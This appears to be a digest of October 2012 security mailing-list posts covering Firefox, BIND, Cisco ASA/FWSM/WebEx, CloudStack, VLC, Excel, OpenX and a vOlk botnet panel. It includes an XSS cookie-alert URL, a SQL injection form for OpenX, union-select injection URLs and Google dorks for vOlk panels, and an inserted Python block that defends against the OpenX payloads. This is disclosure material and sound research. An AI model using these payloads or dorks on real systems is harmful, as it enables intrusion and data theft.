Re: FastStone Image Viewer 4.6 = ReadAVonIP Arbitrary Code Execution
Sorry, that's actually a NULL pointer bug. :) It's not exploitable.
[slackware-security] mozilla-firefox (SSA:2012-283-01)
New mozilla-firefox packages are available for Slackware 13.37, 14.0, and -current to fix security issues.

Here are the details from the Slackware 14.0 ChangeLog:
+--------------------------+
patches/packages/mozilla-firefox-16.0-i486-1_slack14.0.txz: Upgraded.
  This release contains security fixes and improvements.
  For more information, see:
    http://www.mozilla.org/security/known-vulnerabilities/firefox.html
  (* Security fix *)
+--------------------------+

Where to find the new packages:
+-----------------------------+

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 13.37:
ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/mozilla-firefox-16.0-i486-1_slack13.37.txz

Updated package for Slackware x86_64 13.37:
ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/mozilla-firefox-16.0-x86_64-1_slack13.37.txz

Updated package for Slackware 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/mozilla-firefox-16.0-i486-1_slack14.0.txz

Updated package for Slackware x86_64 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/mozilla-firefox-16.0-x86_64-1_slack14.0.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-firefox-16.0-i486-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-firefox-16.0-x86_64-1.txz

MD5 signatures:
+-------------+

Slackware 13.37 package:
29bb11fb476a0deba095a52fa404d21a  mozilla-firefox-16.0-i486-1_slack13.37.txz

Slackware x86_64 13.37 package:
4e519807dfc0f3e1624a5580ea9991d4  mozilla-firefox-16.0-x86_64-1_slack13.37.txz

Slackware 14.0 package:
93783de27aad6a10d7bd4432df90eee2  mozilla-firefox-16.0-i486-1_slack14.0.txz

Slackware x86_64 14.0 package:
dd98523d46b575f31f600fd81657caf8  mozilla-firefox-16.0-x86_64-1_slack14.0.txz

Slackware -current package:
810e5194f8f22883670c72b35ae2a23e  xap/mozilla-firefox-16.0-i486-1.txz

Slackware x86_64 -current package:
13d830a035d24d53dd14196fc3380250  xap/mozilla-firefox-16.0-x86_64-1.txz

Installation instructions:
+------------------------+

Upgrade the package as root:
# upgradepkg mozilla-firefox-16.0-i486-1_slack14.0.txz

+-----+

Slackware Linux Security Team
http://slackware.com/gpg-key
secur...@slackware.com

+------------------------------------------------------------------------+
| To leave the slackware-security mailing list:                          |
+------------------------------------------------------------------------+
| Send an email to majord...@slackware.com with this text in the body of |
| the email message:                                                     |
|                                                                        |
|   unsubscribe slackware-security                                       |
|                                                                        |
| You will get a confirmation message back containing instructions to    |
| complete the process.  Please do not reply to this email address.      |
+------------------------------------------------------------------------+
[ MDVSA-2012:162 ] bind
_______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2012:162
 http://www.mandriva.com/security/
_______________________________________________________________________

 Package : bind
 Date    : October 10, 2012
 Affected: 2011., Enterprise Server 5.0
_______________________________________________________________________

 Problem Description:

 A vulnerability was discovered and corrected in bind:

 A certain combination of records in the RBT could cause named to hang
 while populating the additional section of a response. [RT #31090]
 (CVE-2012-5166).

 The updated packages have been upgraded to bind 9.7.6-P4 and 9.8.3-P4
 which is not vulnerable to this issue.
_______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5166
 https://kb.isc.org/article/AA-00801
 ftp://ftp.isc.org/isc/bind9/9.7.6-P4/CHANGES
 ftp://ftp.isc.org/isc/bind9/9.8.3-P4/CHANGES
_______________________________________________________________________

 Updated Packages:
_______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi. The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security. You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
_______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
                                <security*mandriva.com>
Cisco Security Advisory: Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module
Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module

Advisory ID: cisco-sa-20121010-asa
Revision 1.0
For Public Release 2012 October 10 16:00 UTC (GMT)

Summary
=======

Cisco ASA 5500 Series Adaptive Security Appliances (ASA) and Cisco Catalyst 6500 Series ASA Services Module (ASASM) may be affected by the following vulnerabilities:

  * DHCP Memory Allocation Denial of Service Vulnerability
  * SSL VPN Authentication Denial of Service Vulnerability
  * SIP Inspection Media Update Denial of Service Vulnerability
  * DCERPC Inspection Buffer Overflow Vulnerability
  * Two DCERPC Inspection Denial Of Service Vulnerabilities

These vulnerabilities are independent of each other; a release that is affected by one of the vulnerabilities may not be affected by the others.

Successful exploitation of any of these vulnerabilities could allow an unauthenticated remote attacker to trigger a reload of the affected device. Exploitation of the DCERPC Inspection Buffer Overflow Vulnerability could additionally cause a stack overflow and possibly the execution of arbitrary commands.

Cisco has released free software updates that address these vulnerabilities. Workarounds are available for some of these vulnerabilities.

This advisory is available at the following link:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20121010-asa

Note: The Cisco Firewall Services Module for Cisco Catalyst 6500 and Cisco 7600 Series (FWSM) may be affected by some of the vulnerabilities listed above. A separate Cisco Security Advisory has been published to disclose the vulnerabilities that affect the Cisco FWSM. This advisory is available at:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20121010-fwsm

The Cisco ASA 1000V Cloud Firewall and Cisco ASA-CX Context-Aware Security are not affected by any of these vulnerabilities.
Cisco Security Advisory: Multiple Vulnerabilities in Cisco Firewall Services Module
Multiple Vulnerabilities in Cisco Firewall Services Module

Advisory ID: cisco-sa-20121010-fwsm
Revision 1.0
For Public Release 2012 October 10 16:00 UTC (GMT)

Summary
=======

The Cisco Firewall Services Module (FWSM) for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers is affected by the following vulnerabilities:

  * DCERPC Inspection Buffer Overflow Vulnerability
  * DCERPC Inspection Denial Of Service Vulnerabilities

These vulnerabilities are not interdependent; a release that is affected by one vulnerability is not necessarily affected by the other.

Exploitation of these vulnerabilities could allow an unauthenticated, remote attacker to trigger a reload of the affected device, or to execute arbitrary commands. Repeated exploitation could result in a denial of service (DoS) condition.

Cisco has released free software updates that address these vulnerabilities. There are no workarounds that mitigate these vulnerabilities.

This advisory is available at the following link:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20121010-fwsm

Note: The Cisco Catalyst 6500 Series ASA Services Module, and the Cisco ASA 5500 Series Adaptive Security Appliance may also be affected by these vulnerabilities. The vulnerabilities affecting the Cisco Catalyst 6500 Series ASA Services Module and Cisco ASA 5500 Series Adaptive Security Appliance have been disclosed in a separate Cisco Security Advisory. The Advisory is available at the following link:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20121010-asa
Cisco Security Advisory: Multiple Vulnerabilities in the Cisco WebEx Recording Format Player
Multiple Vulnerabilities in the Cisco WebEx Recording Format Player

Advisory ID: cisco-sa-20121010-webex
Revision 1.0
For Public Release 2012 October 10 16:00 UTC (GMT)

Summary
=======

The Cisco WebEx Recording Format (WRF) player contains six buffer overflow vulnerabilities. In some cases, exploitation of the vulnerabilities could allow a remote attacker to execute arbitrary code on the system with the privileges of a targeted user.

The Cisco WebEx WRF Player is an application used to play back WRF WebEx meeting recordings that have been recorded on a WebEx meeting site or on the computer of an online meeting attendee. The Cisco WebEx WRF Player can be automatically installed when the user accesses a recording file that is hosted on a WebEx meeting site. The Cisco WebEx WRF Player can also be manually installed for offline playback after downloading the application from:
http://www.webex.com/play-webex-recording.html

If the Cisco WebEx WRF Player was automatically installed, it will be automatically upgraded to the latest, nonvulnerable version when users access a recording file that is hosted on a WebEx meeting site. If the Cisco WebEx WRF Player was manually installed, users will need to manually install a new version of the Cisco WebEx WRF Player after downloading the latest version from:
http://www.webex.com/play-webex-recording.html

Cisco has updated affected versions of the WebEx meeting sites and Cisco WebEx WRF Player to address these vulnerabilities.

This advisory is available at the following link:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20121010-webex
[CVE-2012-4501] CloudStack configuration vulnerability
CVE-2012-4501: Apache CloudStack configuration vulnerability

Severity: Critical

Vendors:
  The Apache Software Foundation
  Citrix, Inc.

Versions Affected:
  As no official releases have been made, this does not affect any official Apache CloudStack releases. Anybody using a version of CloudStack generated from the Apache CloudStack source tree prior to October 7th, 2012 will need to take the actions specified below. Please note this includes both Citrix CloudStack commercial and open-source, pre-ASF versions.

Description:
  The CloudStack PPMC was notified of a configuration vulnerability that exists in development versions of the Apache Incubated CloudStack project. This vulnerability allows a malicious user to execute arbitrary CloudStack API calls. A malicious user could, for example, delete all VMs in the system. Addressing this issue is especially important for anybody using CloudStack in a public environment.

Mitigation:
  1) Login to the CloudStack Database via MySQL
       $ mysql -u cloud -p -h host-ip-address
       (enter password as prompted)
  2) Disable the system user and set a random password:
       mysql> update cloud.user set password=RAND() where id=1;
  3) Exit MySQL
       mysql> \q

  Alternatively, users can update to a version of CloudStack based on the git repository on or after October 7th, 2012.

Credit:
  This issue was identified by Hugo Trippaers of Schuberg Philis.
VLC Player 2.0.3 = ReadAV Arbitrary Code Execution (Update)
#!/usr/bin/perl
# VLC Player 2.0.3 = ReadAV Arbitrary Code Execution
# Author: Jean Pascal Pereira pere...@secbiz.de
# Vendor URI: http://www.videolan.org/vlc/
#
# Vendor Description:
# VLC is a free and open source cross-platform multimedia player
# and framework that plays most multimedia files as well as DVD,
# Audio CD, VCD, and various streaming protocols.
#
# Debug Info:
# Microsoft (R) Windows Debugger Version 6.11.0001.404 X86
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# CommandLine: C:\Program Files\VideoLAN\VLC\vlc.exe C:\research\VLC\crafted.png
# Symbol search path is: *** Invalid ***
# * Symbol loading may be unreliable without a symbol search path.
# * Use .symfix to have the debugger choose a symbol path.
# * After setting your symbol path, use .reload to refresh symbol locations.
# Executable search path is:
Microsoft Office Excel ReadAV Arbitrary Code Execution
#!/usr/bin/perl
# Microsoft Office Excel ReadAV Arbitrary Code Execution
# Author: Jean Pascal Pereira pere...@secbiz.de
# Vendor URI: http://office.microsoft.com
#
# Vendor Description:
# Microsoft Excel is a commercial spreadsheet application written and distributed by Microsoft for Microsoft Windows and Mac OS X.
# It features calculation, graphing tools, pivot tables, and a macro programming language called Visual Basic for Applications.
#
# Affected versions:
# Microsoft Office 2007 (confirmed)
# Microsoft Excel Reader 12 (confirmed)
# Microsoft Office 2010 (not confirmed yet)
#
# Debug Info:
# Microsoft (R) Windows Debugger Version 6.11.0001.404 X86
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# CommandLine: C:\Program Files\Microsoft Office\Office12\XLVIEW.EXE C:\research\MSExcel\crafted.xls
# Symbol search path is: *** Invalid ***
# * Symbol loading may be unreliable without a symbol search path.
# * Use .symfix to have the debugger choose a symbol path.
# * After setting your symbol path, use .reload to refresh symbol locations.
# Executable search path is:
#
# (9c.380): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000001 ebx=00128320 ecx=00123b40 edx=008d2d04 esi=02284800 edi=00000130
# eip=3025c1fc esp=00123b30 ebp=00123b48 iopl=0         nv up ei pl nz na po nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
# *** ERROR: Symbol file could not be found.  Defaulted to export symbols for Excel.exe -
# Excel!Ordinal40+0x25c1fc:
# 3025c1fc 668b0f          mov     cx,word ptr [edi]        ds:0023:00000130=
# 0:000> r;!exploitable -v;q
# eax=00000001 ebx=00128320 ecx=00123b40 edx=008d2d04 esi=02284800 edi=00000130
# eip=3025c1fc esp=00123b30 ebp=00123b48 iopl=0         nv up ei pl nz na po nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000
Multiple vulnerabilities in OpenX
Advisory ID: HTB23116
Product: OpenX
Vendor: OpenX
Vulnerable Version(s): 2.8.10 and probably prior
Tested Version: 2.8.10
Vendor Notification: September 19, 2012
Public Disclosure: October 10, 2012
Vulnerability Type: Cross-Site Scripting [CWE-79], SQL Injection [CWE-89]
CVE References: CVE-2012-4989, CVE-2012-4990
CVSSv2 Base Scores: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N), 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Risk Level: Medium
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in OpenX, which can be exploited to perform Cross-Site Scripting (XSS) and SQL Injection attacks.

1) Cross-Site Scripting (XSS) in OpenX: CVE-2012-4989

Input passed via the "parent" GET parameter to /www/admin/plugin-index.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in the administrator's browser session in the context of an affected website.

The following PoC (Proof of Concept) demonstrates the vulnerability:

http://[host]/www/admin/plugin-index.php?action=info&group=vastInlineBannerTypeHtml&parent=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

2) SQL Injection in OpenX: CVE-2012-4990

Input passed via the "ids[]" POST parameter to /www/admin/campaign-zone-link.php is not properly sanitised before being used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The following PoC demonstrates the vulnerability:

<form action="http://[host]/www/admin/campaign-zone-link.php" method="post">
<input type="hidden" name="action" value="link" />
<input type="hidden" name="ids[]" value="z1)) OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- " />
<input type="hidden" name="clientid" value="[CLIENT_ID]" />
<input type="hidden" name="campaignid" value="[CAMPAIGN_ID]" />
<input type="hidden" name="" value="" />
<input type="hidden" name="" value="" />
<input type="hidden" name="" value="" />
<input type="hidden" name="" value="" />
<input type="submit" id="btn" />
</form>

Successful exploitation of this vulnerability requires the attacker to be registered, logged in and to have permission to access "link zone".

-----------------------------------------------------------------------------------------------

Solution:

Fixed in SVN repository, revision 81823

Replace the following files:
[CWE-79] https://svn.openx.org/openx/trunk/lib/templates/admin/plugin-group-view.html
[CWE-89] https://svn.openx.org/openx/trunk/www/admin/campaign-zone-link.php

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23116 - https://www.htbridge.com/advisory/HTB23116 - Multiple vulnerabilities in OpenX.
[2] OpenX - http://www.openx.com - Open source ad serving platform for publishers.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
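The advisory names the two inputs at fault (the "parent" GET parameter that is reflected unescaped, and the "ids[]" POST array that reaches the SQL query); the following is an added example, not OpenX's or High-Tech Bridge's code, of the server-side handling that closes both holes, written as a small Python model of the two endpoints rather than the project's PHP. The table name `ad_zone_assoc` and the functions `parse_zone_ids`, `link_zones` and `render_plugin_index` are hypothetical, and the sample inputs are the advisory's two PoC payloads.

```python
"""Defensive handling of the two OpenX admin parameters from HTB23116.
Added example; names and the ad_zone_assoc table are hypothetical."""
import html
import re
import sqlite3

# Constructed sample inputs: the two PoC payloads quoted in the advisory.
XSS_PARENT = '"><script>alert(document.cookie);</script>'
SQLI_IDS = ["z1)) OR 1=(select min(@a:=1)from (select 1 union select 2)k "
            "group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- "]

# A zone id is a plain positive integer of sane length; nothing else is accepted.
_ZONE_ID = re.compile(r"^[1-9][0-9]{0,9}$")


def parse_zone_ids(raw_ids):
    """Validate every element of ids[] before it goes anywhere near SQL.
    One bad element rejects the whole request instead of silently dropping it."""
    ids = []
    for value in raw_ids:
        if not isinstance(value, str) or not _ZONE_ID.match(value.strip()):
            raise ValueError(f"rejected non-numeric zone id: {value!r}")
        ids.append(int(value))
    return ids


def link_zones(conn, campaign_id, raw_ids):
    """Link a campaign to zones with a parameterised query, so the user value is
    bound as data and can never change the shape of the statement."""
    ids = parse_zone_ids(raw_ids)
    campaign_id = int(campaign_id)
    conn.executemany(
        "INSERT INTO ad_zone_assoc (zone_id, campaign_id) VALUES (?, ?)",
        [(zone_id, campaign_id) for zone_id in ids],
    )
    conn.commit()
    return len(ids)


def render_plugin_index(parent):
    """Echo the parent parameter back into the page only after HTML-escaping it
    (quote=True also covers the attribute-breakout used by the PoC)."""
    safe = html.escape(parent, quote=True)
    return f'<input type="hidden" name="parent" value="{safe}" />'


def demo():
    """Run both endpoints against benign input and against the PoC payloads."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ad_zone_assoc (zone_id INTEGER, campaign_id INTEGER)")
    linked = link_zones(conn, "7", ["3", "4"])      # benign request succeeds
    try:
        link_zones(conn, "7", SQLI_IDS)             # PoC payload is rejected
        blocked = False
    except ValueError:
        blocked = True
    rows = conn.execute("SELECT COUNT(*) FROM ad_zone_assoc").fetchone()[0]
    return linked, blocked, rows, render_plugin_index(XSS_PARENT)


if __name__ == "__main__":
    print(demo())
```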
vOlk Botnet Framework v4.0 - Multiple Web Vulnerabilities
Title:
======
vOlk Botnet Framework v4.0 - Multiple Web Vulnerabilities

Date:
=====
2012-10-09

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=721

VL-ID:
=====
721

Common Vulnerability Scoring System:
====================================
8.3

Introduction:
=============
vOlk-Botnet v4.0 is a remote administration tool; its main function is to manage the HOSTS file of Windows operating systems. The code was created by [byvOlk] in PHP and Visual Basic 6.0.

Features:
[+] Add Startup
[+] Download Execute.
[+] Visit Webpage [Visible].
[+] Visit Webpage [Invisible].
[+] Mutex
[+] Stealer FTP(Filezilla)
[+] Msn Stealer(Messenger Save User)
[+] Statistics Bots

Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the vOlk-Botnet framework application v4.0 private edition.

Report-Timeline:
================
2012-10-09: Public or Non-Public Disclosure

Status:
=======
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
Critical

Details:
========
1.1
The vulnerability laboratory research team discovered multiple SQL injection vulnerabilities in the vOlk-Botnet framework application v4.0 private edition. The SQL vulnerabilities allow remote attackers to inject/execute their own SQL commands/statements on the affected vOlk botnet application control panel DBMS. The vulnerabilities are located in the Messenger, Filezilla and Estadisticas files with the bound vulnerable "pag" listing parameter. The vulnerability can be exploited by remote attackers without required user interaction. Successful exploitation of the vulnerabilities results in botnet control panel compromise via remote SQL injection attack.

Vulnerable File(s):
[+] Messenger.php
[+] Filezilla.php
[+] Estadisticas.php

Vulnerable Parameter(s):
[+] pag

1.2
The vulnerability laboratory research team discovered multiple persistent web vulnerabilities in the vOlk-Botnet framework application v4.0 private edition. The input validation vulnerabilities allow remote attackers to inject their own malicious persistent script code on the application side of the botnet framework. The vulnerabilities are located in the Visit Webpage (Open URL), MSN Stealer, Download File and Setting modules with the bound vulnerable domin, Pasw, https or messenger bot's name parameters. The vulnerability can be exploited by a remote attacker with low or medium required user interaction. Successful exploitation of the vulnerabilities results in botnet control panel compromise via session hijacking, persistent web context manipulation or combined CSRF request manipulation.

Vulnerable Module(s):
[+] MSN Stealer
[+] Visit Webpage (Open URL)
[+] Download File
[+] Setting

Vulnerable Parameter(s):
[+] Name - Bot's Name
[+] URL - Open URL Bots
[+] URL - Download url
[+] Password Administrator
[+] User Administrator

Dork CodeSearch:
pfont color=``#FF`` face=``Tahoma`` size=``1``vOlk-Botnet 4.0/font/p`` or ``title[vOlk-Botnet]v 4.0 Login/title``

DorK Google:
allinurl:vOlk-Botnet 4.0 or subtitle:[byvOlk] - WebAdmin Panel ® vOlk-Botnet 4.0 and allinurl:WebAdmin/archivos/imagen/logo.jpg

Proof of Concept:
=================
1.1
The SQL injection vulnerabilities can be exploited by a remote attacker without a privileged application user account and without required user interaction. For demonstration or reproduce ...

http://[SERVER]/images/WebAdmin/Controladores/Messenger.php?pag=-1%27%20union all select id from pharming--
http://[SERVER]/images/WebAdmin/Controladores/Filezilla.php?pag=-1%27%20union all select id from pharming--
http://[SERVER]/images/WebAdmin/Vistas/Estadisticas.php?pais=-1%27%20union all select id from pharming--

--- SQL Exceptions ---
Sentencia Incorrecta : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-100 , 100' at line 1
---
Sentencia Incorrecta : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''-1'' ORDER BY fecha DESC LIMIT 0 , 45' at line 1
---
Sentencia Incorrecta : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-200 , 100' at line 1
--
SELECT * FROM zombis
SELECT * FROM pharming

1.2
The persistent script code inject vulnerabilities can be exploited by remote attackers without a privileged application user account but with low or medium required user interaction. For